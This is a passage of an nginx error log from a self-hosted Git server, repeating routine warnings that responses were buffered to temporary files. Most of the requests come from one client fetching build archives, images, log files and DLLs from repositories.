/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 15:50:57 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/35/0000014352 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 15:51:38 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/35/0000014353 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 15:51:43 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/35/0000014354 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 15:52:16 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/35/0000014355 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 15:52:23 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/35/0000014356 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 15:52:55 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/35/0000014357 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +2026/02/17 15:53:13 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/35/0000014358 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" +2026/02/17 15:53:21 [warn] 921#921: *62321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/35/0000014359 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" +2026/02/17 16:01:19 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/36/0000014360 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 16:01:37 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/36/0000014361 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 16:01:53 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/36/0000014362 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 16:02:00 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/36/0000014363 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 16:02:40 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/36/0000014364 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 16:03:18 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/36/0000014365 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 16:03:24 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/36/0000014366 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 16:03:28 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/36/0000014367 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 16:04:01 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/36/0000014368 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 16:04:08 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/36/0000014369 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 16:04:27 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/37/0000014370 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 16:04:30 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/37/0000014371 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 16:04:31 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/37/0000014372 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 16:04:43 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/37/0000014373 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 16:04:48 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/37/0000014374 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 16:04:51 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/37/0000014375 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 16:05:02 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/37/0000014376 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 16:05:05 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/37/0000014377 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 16:14:20 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/12/0000015121 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +2026/02/17 16:14:34 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/12/0000015122 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +2026/02/17 16:14:48 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/12/0000015123 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +2026/02/17 16:14:51 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/12/0000015124 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +2026/02/17 16:24:20 [warn] 921#921: *66833 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000015125 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +2026/02/17 16:29:45 [warn] 921#921: *67836 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000015126 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +2026/02/17 16:40:29 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000015127 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +2026/02/17 16:41:41 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000015128 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +2026/02/17 16:43:54 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000015129 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +2026/02/17 16:46:32 [warn] 919#919: *69854 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000015130 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +2026/02/17 16:54:50 [warn] 919#919: *69854 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000015131 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +2026/02/17 16:55:43 [warn] 919#919: *70857 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000015132 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +2026/02/17 16:57:37 [warn] 919#919: *70857 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000015133 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 17:06:01 [warn] 923#923: *71863 an upstream 